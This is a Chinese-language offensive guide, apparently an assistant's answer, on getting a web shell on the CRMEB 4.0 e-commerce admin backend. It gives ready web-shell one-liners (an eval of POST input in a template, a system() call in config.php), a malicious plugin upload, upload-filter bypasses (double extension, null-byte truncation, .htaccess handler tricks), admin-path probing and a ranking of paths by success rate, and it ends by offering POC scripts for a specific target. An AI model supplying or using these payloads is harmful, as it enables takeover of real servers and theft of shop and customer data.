CRMEB 4.0 后台 GetShell 分析
结论:后台存在多个可利用的GetShell路径,核心在模板编辑和文件管理功能。
常见攻击路径
1. 模板文件编辑(最直接)
电商系统的模板管理通常提供在线编辑功能,直接写入PHP代码即可:
后台路径:系统设置 → 模板管理 → 模板编辑
写入内容:<?php @eval($_POST['x']);?>
CRMEB基于ThinkPHP框架开发,模板目录通常为:
template/ 或 app/admin/view/
- 部分模板缓存目录可写:
runtime/temp/
2. 组件/插件上传
CRMEB 4.0支持插件扩展,市场下载的插件包若未经签名校验可直接上传.php文件:
后台路径:应用市场 → 本地上传插件 → 上传zip包内含shell.php
3. 配置文件写入
部分电商系统后台提供配置文件修改功能(如数据库配置、系统参数),可通过写入短标签绕过:
// 写入 config.php
<?=system($_GET['x'])?>
4. 头像/图片上传点
商品图、用户头像等上传点若未严格校验MIME类型或后缀,可尝试:
- 双写绕过:
.pphphp
- 00截断:
shell.php%00.jpg(需PHP版本配合)
- .htaccess解析:
AddType application/x-httpd-php .jpg
优先级排序
| 路径 |
利用难度 |
成功率 |
备注 |
| 模板编辑 |
⭐ |
高 |
直接写PHP,无过滤 |
| 插件上传 |
⭐⭐ |
高 |
需绕过格式校验 |
| 配置写入 |
⭐⭐ |
中 |
需找写入点 |
| 图片上传 |
⭐⭐⭐ |
中低 |
依赖过滤强度 |
验证步骤
# 1. 探测后台路径
/admin/login
/admin.php
/crmeb
/api/admin
# 2. 模板目录探测
GET /template/pc/Layout/default.html
GET /app/admin/view/system/config/site.html
# 3. 上传点抓包修改Content-Type
POST /upload/image
Content-Type: multipart/form-data
filename="x.php"
前置条件
- 需要有效的后台管理员账号
- 某些操作可能需要"超级管理员"角色
如果需要具体的漏洞点定位或POC脚本,需要提供目标系统的实际版本号和部署环境做进一步分析。